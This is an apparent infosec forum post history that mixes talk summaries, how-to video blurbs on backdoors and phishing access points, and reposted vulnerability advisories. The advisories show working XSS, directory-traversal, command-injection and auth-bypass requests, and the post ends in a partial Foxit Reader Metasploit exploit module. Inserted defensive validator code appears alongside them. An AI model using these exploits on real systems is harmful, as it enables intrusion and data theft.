Praetorian503
Active Members
Posts: 578
Days Won: 5
Everything posted by Praetorian503
-
Description: What kind of internal and external controls from regulations and other sources are there? What is IT-Risk and IT-Compliance management? Why and for whom does it matter? How can we handle it and how does compliance aggregation fit into the picture? We will then look at the SOMAP.org project, which is an Open Source project working on tools to handle IT-Compliance aggregation and IT Security compliance management in general. We will discuss why compliance management is not only about hot air but can make sense when done right. Adrian Wiesmann held this talk at the DeepSec 2011 conference.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source: IT Security Compliance Management can be done right (and makes sense when done right) on Vimeo
Source: It Security Compliance Management Can Be Done Right (And Makes Sense When Done Right)
-
Description: The talk aims to provide an introduction to the Windows Phone 7 (WP7) security model to allow security professionals and application developers to understand the unique platform security features offered. Currently very little public information is available about Windows Phone 7 OS security, preventing adequate determination of the risk exposed by WP7 devices. The ever increasing challenges and stages of exploitation an attacker has to overcome to achieve full compromise will be discussed. The talk will outline the implementation of these security features and will demonstrate weaknesses and vulnerabilities an attacker could use to bypass the multiple levels of platform security. A number of OEM manufacturer weaknesses, "features?", will be discussed and a demonstration of how these "features" can be abused in conjunction with conventional exploits to achieve full compromise of the phone will be performed. The talk will demonstrate how OEM phone manufacturers can weaken the security posture of an otherwise strong granular security model and also demonstrate how targeted attacks can be made which leverage this OEM "functionality" to compromise sensitive information. Alex Plaskett held this talk at the DeepSec 2011 security conference.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source: Windows Pwn 7 OEM - Owned Every Mobile? on Vimeo
Source: Windows Pwn 7 Oem - Owned Every Mobile?
-
Description: In this video I will show you how to analyse SilentBanker malware memory using the Volatility Framework.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Volatility Silentbanker Malware Analysis
-
Description: In this video I will show you how to create a persistence backdoor using Metasploit meterpreter. This is a very old trick but still useful for maintaining access on a system using an AB script.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Metasploit - Persistence Backdoor
-
A memory corruption vulnerability has been identified in Photodex ProShow Producer version 5.0.3297. When opening a crafted style file (.pxs), the application loads the "title" value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the "title" value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system.

Inshell Security Advisory
http://www.inshell.net

1. ADVISORY INFORMATION
-----------------------
Product: Photodex ProShow Producer
Vendor URL: www.photodex.com
Type: Improper Restriction of Operations within the Bounds of a Memory Buffer [CWE-119]
Date found: 2013-02-14
Date published: 2013-02-14
CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE: -

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from Inshell Security.

3. VERSIONS AFFECTED
--------------------
Photodex ProShow Producer v5.0.3297, older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
A memory corruption vulnerability has been identified in Photodex ProShow Producer v5.0.3297. When opening a crafted style file (.pxs), the application loads the "title" value from the pxs file. The ColorPickerProc function does not properly validate the length of the string loaded from the "title" value from the pxs file before using it in the further application context, which leads to a memory corruption condition with possible code execution depending on the version of the operating system.

Vulnerable function definition (all.dnt):
__stdcall ColorPickerProc(x, x, x, x)

An attacker needs to force the victim to open a crafted .pxs file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in denial-of-service conditions.

5. PROOF-OF-CONCEPT (Code / Exploit)
------------------------------------
The following generated string has to be inserted into a .pxs file to trigger the vulnerability on Windows XP SP3.

#!/usr/bin/python

file="poc.txt"

junk1="\x41" * 233
eip="\x42" * 4
junk2="\xCC" * 100

poc=junk1 + eip + junk2

try:
    print ("[*] Creating exploit file...\n");
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print ("[*] File successfully created!");
except:
    print ("[!] Error while creating file!");

For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/46

6. SOLUTION
-----------
None

7. REPORT TIMELINE
------------------
2013-02-14: Discovery of the vulnerability
2013-02-14: Full Disclosure because the vendor ignored all previous reports.

8. REFERENCES
-------------
http://security.inshell.net/advisory/46

Source: PacketStorm
-
The Edimax EW-7206APg and EW-7209APg suffer from cross site scripting, HTTP header injection, and open redirection vulnerabilities.

Device Name: EW-7206APg / EW-7209APg
Vendor: Edimax

============
Vulnerable Firmware Releases:
============
Device: EW-7206APg
Hardware Version Rev. A
Runtime Code Version v1.32
Runtime Code Version V1.33

Device: EW-7209APg
Hardware Version Rev. A
Runtime Code Version 1.21
Runtime Code Version 1.29

============
Device Description:
============
Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b wireless LAN, this wireless LAN access point can let your wireless LAN client stations access both the wired and the wireless network nodes.
EW-7206APg: http://www.edimax.com/en/produce_detail.php?pl1_id=25&pl2_id=134&pl3_id=359&pd_id=18
EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1

============
Vulnerability Overview:
============

* URL Redirection:
Parameter: submit-url and wlan-url
http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd

* Reflected XSS:
Parameter: submit-url and wlan-url
Injecting scripts into the parameter submit-url or wlan-url reveals that this parameter is not properly validated for malicious input.
Example Exploit:
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=&chan=11&macAddrValue=&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=54&y=12&wlan-url=test><script>alert('XSSed')</script>test

* Stored XSS in System Utility -> Domain Name:
=> parameter: DomainName
Injecting scripts into the parameter DomainName reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
http://192.168.178.175/goform/formTcpipSetup?oldpass=&newpass=&confpass=&ip=192.168.178.175&mask=255.255.255.0&gateway=0.0.0.0&dhcp=2&DhcpGatewayIP=0.0.0.0&DhcpNameServerIP=0.0.0.0&dhcpRangeStart=192.168.178.100&dhcpRangeEnd=192.168.178.200&DomainName="><script>alert(2)</script>&leaseTimeGet=946080000&leaseTime=946080000&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged=

* Stored XSS in wireless settings / basic settings -> ESSID
-> The injected script code gets executed within the device information
Injecting scripts into the parameter ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
Example Request:
POST /goform/formWlanSetup HTTP/1.1
Host: 192.168.178.175
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.175/wlbasic.asp
Authorization: Basic xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 351

apMode=0&band=2&ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=50&y=20&wlan-url=%2Fwlbasic.asp

* HTTP Header Injection:
Parameter: submit-url
Injecting code into the parameter submit-url reveals that this parameter is not properly validated for malicious input and so it is possible to manipulate the header information.
http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND

Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sat Jan 1 14:06:23 2000
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.178.175/e82f5
New Header: PWND
<snip>

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-009
Twitter: @s3cur1ty_de

============
Time Line:
============
September 2012 - discovered vulnerability
21.09.2012 - contacted vendor with vulnerability details
24.09.2012 - vendor responded that they will not provide a fix
14.02.2013 - public disclosure

=====================
Advisory end
=====================

Source: PacketStorm
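Added example, written here from the defender's side and not code from the advisory or from the Edimax firmware: a validator for a "return to" parameter like submit-url / wlan-url. It refuses the two abuses the advisory shows, CR/LF characters that inject extra response headers and absolute URLs that make the redirect off-site; the set of allowed pages is an assumption.

```python
from urllib.parse import unquote, urlsplit

# Hypothetical set of pages the firmware is allowed to send the browser back to.
ALLOWED_PATHS = {"/wlbasic.asp", "/sysutility.asp", "/index.asp"}


def safe_redirect_target(raw_value, default="/index.asp"):
    """Turn the still URL-encoded submit-url / wlan-url value into a path that is
    safe to place in a Location header, or fall back to `default`."""
    value = unquote(raw_value)  # decode exactly once
    # Header injection: any CR, LF or other control character would terminate
    # the Location value and start a new header line in the raw response.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return default
    # Open redirect: a scheme or a host part means an off-site target
    # (http://www.google.de, http://www.pwnd.pwnd, javascript:...).
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    # Protocol-relative ("//host") and backslash forms are off-site in browsers too.
    if value.startswith("//") or "\\" in value:
        return default
    # Only known same-site pages survive; query string and fragment are dropped,
    # which also discards the reflected-XSS payloads shown above.
    return parts.path if parts.path in ALLOWED_PATHS else default


def redirect_response_lines(raw_value):
    """The header lines a GoAhead-style 302 handler would emit for the value."""
    return ["HTTP/1.0 302 Redirect", "Location: " + safe_redirect_target(raw_value)]
```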
-
The TP-Link TL-WA701N and TL-WA701ND suffer from stored cross site scripting and directory traversal vulnerabilities.

Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link

============
Vulnerable Firmware Releases:
============
Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND
Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

============
Vulnerability Overview:
============

* Directory Traversal:
Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/

==>> no authentication needed!!!

Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WA701N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

This traversal vulnerability was already reported on some other TP-Link devices:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

* The request for changing the password is an HTTP GET and the username and password are parameters of this HTTP GET:
http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save

* Stored XSS:
Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
-> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc)
Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save
This XSS vulnerability was already documented on another device and firmware version:
http://www.exploit-db.com/exploits/19774/

* Stored XSS:
-> System Tools -> SNMP:
Injecting scripts into the parameters sys_name and sys_location reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter: @s3cur1ty_de

The traversal vulnerability was already reported on some other TP-Link devices:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse
The stored XSS vulnerability in the Desc parameter was already documented on another device and firmware version:
http://www.exploit-db.com/exploits/19774/

============
Time Line:
============
August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release

=====================
Advisory end
=====================

Source: PacketStorm
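Added example, not code from the advisory or from the TP-Link firmware: the path check an embedded web server needs so that a request like /help/../../etc/passwd cannot leave the document root, plus the same check run over a few constructed access-log lines to flag traversal attempts. The document root /www and the log lines are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

DOC_ROOT = "/www"  # hypothetical document root of the embedded web server

# Constructed access-log lines in a common-log-like shape (not real device logs).
CONSTRUCTED_LOG = [
    '192.168.178.50 - - [14/Feb/2013:10:00:01] "GET /help/ HTTP/1.1" 200',
    '192.168.178.50 - - [14/Feb/2013:10:00:02] "GET /help/../../etc/passwd HTTP/1.1" 200',
    '192.168.178.50 - - [14/Feb/2013:10:00:03] "GET /help/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200',
    '192.168.178.50 - - [14/Feb/2013:10:00:04] "GET /userRpm/Index.htm HTTP/1.1" 200',
]


def resolve_request_path(request_path, doc_root=DOC_ROOT):
    """Map a request-target onto a file path inside doc_root, or None to refuse.

    Refusing beats cleaning up: a request that needs ".." collapsed is hostile,
    so it is rejected even when the normalised form would stay inside the root.
    """
    # Decode exactly once; decoding twice would turn %252e%252e into "..".
    path = unquote(request_path.split("?", 1)[0])
    if "\x00" in path or "\\" in path:
        return None
    # ".." as a whole segment is the traversal primitive, encoded or not.
    if ".." in path.split("/"):
        return None
    normalised = posixpath.normpath(path if path.startswith("/") else "/" + path)
    full = posixpath.join(doc_root, normalised.lstrip("/"))
    # Belt and braces: the joined result must still sit under the root.
    if full != doc_root and not full.startswith(doc_root + "/"):
        return None
    return full


def hostile_requests(log_lines):
    """Return the request-targets in the given log lines that fail the check."""
    hits = []
    for line in log_lines:
        m = re.search(r'"([A-Z]+) (\S+) HTTP/[\d.]+"', line)
        if m and resolve_request_path(m.group(2)) is None:
            hits.append(m.group(2))
    return hits
```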
-
Description: In this video Jeremy Druin talks about SQL Server hacking tricks and advanced exploitation techniques. He will cover topics like:
Database Exploitation/Post Exploitation
Recon: Detecting SQL Server (Passive)
Scanning: Detecting SQL Server (Active)
Browsing SQL Server
SQL Injection
etc.
More Information:
- SQL Server Hacking from ISSA Kentuckiana workshop 7 - Jeremy Druin (Hacking Illustrated Series InfoSec Tutorial Videos)
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Sql Server Hacking
-
Description: Forensic Timeline Analysis is the putting together of actions and events sequentially and chronologically. Construction and presentation of timelines has become a critical investigative method to solve complex issues. To a great extent Timeline Analysis is a bit of a complicated technique to understand, and the digital environment has different and unique challenges. Timestamps can be found in various time formats and they are presented or stored with various interpretations. Timeline building techniques are evolving and have changed the way an analyst can approach cases. With this discussion we will take a deep dive through the details, from timeline basics through the role of timeline analysis in solving cases such as USB device activities, intrusion/malware analysis and intellectual property theft artifacts etc. During the session we will discuss methodologies on how to start building a timeline and the Granular Approach vs the Kitchen Sink. Timeline Analysis includes methods using easily accessible tools and frameworks. Using this technique we gain much more information than can be obtained with traditional techniques such as only the MAC (Modified, Access, and Change) times from a file system. To achieve the goal we will take a deep dive into timestamps associated with:
· Web Server such as Apache/IIS
· Browser Activity such as IE History/Chrome/Firefox
· Windows Event Timestamps, Generic Linux Logs
· Windows Registry, Prefetch, Recycle bin, Restore Points
· Windows Shortcuts (.lnk)
· USB Device Activity
· PDF, Office Files Metadata Timestamps
· Flash Cookies or Adobe Local Shared Objects
· Live Memory Timestamps
· Antivirus, ISA log, Firewall timestamps
· Squid Proxy
· Network Packet Dumps
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Nullcon Delhi 2012: Forensics Timeline Analysis - By Ashish Kunte
-
Description: In this video Jeremy Druin talks about Burp Suite proxy usage: how to configure it and how to launch basic attacks using the Burp Suite proxy. He will cover most of the good features of Burp Suite like Sequencer, Repeater, Intruder, Decoder etc. For setting up your environment use Mutillidae or DVWA.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Mutillidae: Introduction To Installing, Configuring, And Using Burp-Suite Proxy
-
Ultra Light Forum suffers from a persistent cross site scripting vulnerability.

# Ultra Light Forum Persistent XSS Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/advisories/?id=86
# Script: http://sourceforge.net/projects/ultralightforum/files/
# Tested: Win 7

Description:
Ultra Light Forum is developed in PHP and MySQL as a standalone forum with high speed and high user-friendliness. Users can create and delete topics and can reply to others' topics. The forum also comes with a poll, where users can vote. To know more, try UL Forum.

Proof of Concept:
Choose profile settings, put <script>alert(document.cookie)</script> in the messages box and update your profile. So if any user views your profile, the script will be executed.

Demo:
http://bastardlabs.info/demo/ultraforum1.png
http://bastardlabs.info/demo/ultraforum2.png

Source: PacketStorm
-
Raidsonic versions IB-NAS5220 and IB-NAS4220-B suffer from authentication bypass and persistent cross site scripting vulnerabilities.

Device Name: IB-NAS5220 / IB-NAS4220-B
Vendor: Raidsonic

============
Vulnerable Firmware Releases:
============
Product Name IB-NAS5220 / IB-NAS4220-B
Tested Firmware IB5220: 2.6.3-20100206S
Tested Firmware IB4220: 2.6.3.IB.1.RS.1
Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip

============
Vulnerability Overview:
============

* Authentication Bypass:
-> Access the following URL to bypass the login procedure:
http://<IP>/nav.cgi?foldName=adm&localePreference=en

* Stored XSS:
System -> Time Settings -> NTP Server -> User Define
Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png

* Unauthenticated OS Command Injection
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.
Example Exploit:
POST /cgi/time/timeHandler.cgi HTTP/1.1
Host: 192.168.178.41
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.41/cgi/time/time.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-010
Twitter: @s3cur1ty_de

============
Time Line:
============
August 2012 - discovered vulnerability
27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B
28.08.2012 - vendor responded that they will not publish an update
15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220
15.10.2012 - vendor responded that they will not publish an update
12.02.2013 - public release

=====================
Advisory end
=====================

Source: PacketStorm
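Added example, not code from the advisory or from the Raidsonic firmware: the bug pattern behind the timeHandler.cgi command injection beside a hardened handler for the same POST body. The helper program /sbin/settz, the zone allowlist and the numeric ranges are assumptions; the body is the one from the advisory, constructed here as input.

```python
import re
from urllib.parse import parse_qs

# The POST body from the advisory, constructed as test input; COMMAND stands in
# for whatever an attacker would place between the backticks.
CONSTRUCTED_BODY = (
    "month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`"
    "&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210"
    "&old_timeZone=Amsterdam&renew=0"
)

# Hypothetical allowlist: the zone names the firmware's own dropdown offers.
KNOWN_ZONES = {"Amsterdam", "Berlin", "London", "New_York", "Tokyo"}
# Hypothetical ranges for the numeric fields of the same form.
INT_FIELDS = {"month": (1, 12), "date": (1, 31), "year": (2000, 2099),
              "hour": (1, 12), "minute": (0, 59)}


def _fields(body):
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_command(body):
    """The vulnerable shape: the timeZone value is spliced into a command string
    that is later handed to a shell, so anything inside backticks is executed
    with the web server's privileges (root on this NAS)."""
    return "/sbin/settz " + _fields(body).get("timeZone", "")


def hardened_argv(body):
    """The hardened handler: every field is checked against a range or an
    allowlist and the result is an argv list for a shell-free exec
    (subprocess.run(argv) with the default shell=False, never system()).
    Returns (http_status, argv); 400 means the request is refused and nothing runs."""
    f = _fields(body)
    values = {}
    for name, (lo, hi) in INT_FIELDS.items():
        raw = f.get(name, "")
        if not raw.isdigit() or not lo <= int(raw) <= hi:
            return 400, None
        values[name] = int(raw)
    if f.get("m") not in ("AM", "PM"):
        return 400, None
    zone = f.get("timeZone", "")
    # Allowlist membership is the real control; the pattern check additionally
    # stops a zone containing a shell metacharacter from ever entering the list.
    if not re.fullmatch(r"[A-Za-z_]+", zone) or zone not in KNOWN_ZONES:
        return 400, None
    hour24 = values["hour"] % 12 + (12 if f["m"] == "PM" else 0)
    stamp = "%04d-%02d-%02dT%02d:%02d" % (
        values["year"], values["month"], values["date"], hour24, values["minute"])
    return 200, ["/sbin/settz", zone, stamp]
```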
-
Description: In this video Jeremy Druin talks about basic usage of sqlmap; this video is part of the ISSA KY Workshop. The video will cover sqlmap usage: automated SQL injection auditing, enumerating the database account, databases, schema, tables, columns and password hashes etc. A must watch if you are interested in the sqlmap tool. For setting up your environment use Mutillidae or DVWA.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Basics Of Using Sqlmap - Issa Ky Workshop
-
Description: In this video you will learn how to bypass FreeSSHd authentication using the Metasploit Framework. For exploiting this vulnerability you need only the username, which defaults to root.
Affected Version:
- Freesshd version 1.2.6 and prior
More Information:
- CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Cve-2012-6066 Freesshd Authentication Bypass Metasploit Demo
-
Description: This video is all about the VMWare OVF Tool format string vulnerability and exploiting that vulnerability using Metasploit. This vulnerability was discovered and reported by Jeremy Brown - Microsoft.
Affected Versions are:
VMware OVF Tool 2.1 and previous for Windows
VMware Workstation 8.0.5 and previous for Windows
VMware Player 4.0.4 and previous for Windows
More Information:
- CVE-2012-3569 VMWare OVF Tool Vulnerability Metasploit Demo
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Cve-2012-3569 Vmware Ovf Tools Format String Vulnerability Metasploit Demo
-
Description: In this demo I will show you how to create a fake AP for stealing passwords and how to use the Social-Engineering Toolkit for creating a fake webpage for phishing. Here the Social-Engineering Toolkit is a very useful tool for creating a fake page, and once the victim enters the password it will auto redirect to the main page, so maybe the victim will think "I have entered the wrong password".
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Fake Ap – Compromise Passwords Using Set.
-
Description: Create an Executable Backdoor using a PowerShell Script. In this video I will show you how to create a backdoor using a PowerShell script. Before you start you need the PowerGUI Script Editor for converting the PowerShell script into an exe, and this exe is fully undetectable, of course. Now create your own script for exploitation or use the Social-Engineering Toolkit for the PowerShell script; the reverse shell script is used for this demo.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Create An Executable Backdoor Using Powershell Script.
-
Thanks, I needed something more concrete. It's time for me to get down to studying.
-
This Metasploit module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530). ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML Rank = NormalRanking def initialize(info={}) super(update_info(info, 'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530). 
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>',       # initial discovery and poc
          'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
          'juan vazquez',                       # metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '89030' ],
          [ 'BID', '57174' ],
          [ 'EDB', '23944' ],
          [ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
          [ 'URL', 'http://secunia.com/advisories/51733/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'EXITFUNC'             => "process",
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # npFoxitReaderPlugin.dll version 2.2.1.530
          [ 'Automatic', {} ],
          [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
            {
              'Offset'          => 272,
              'Ret'             => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
              'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
              :rop              => :win7_rop_chain
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 7 2013",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    # If the target is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    # Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
    nt      = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
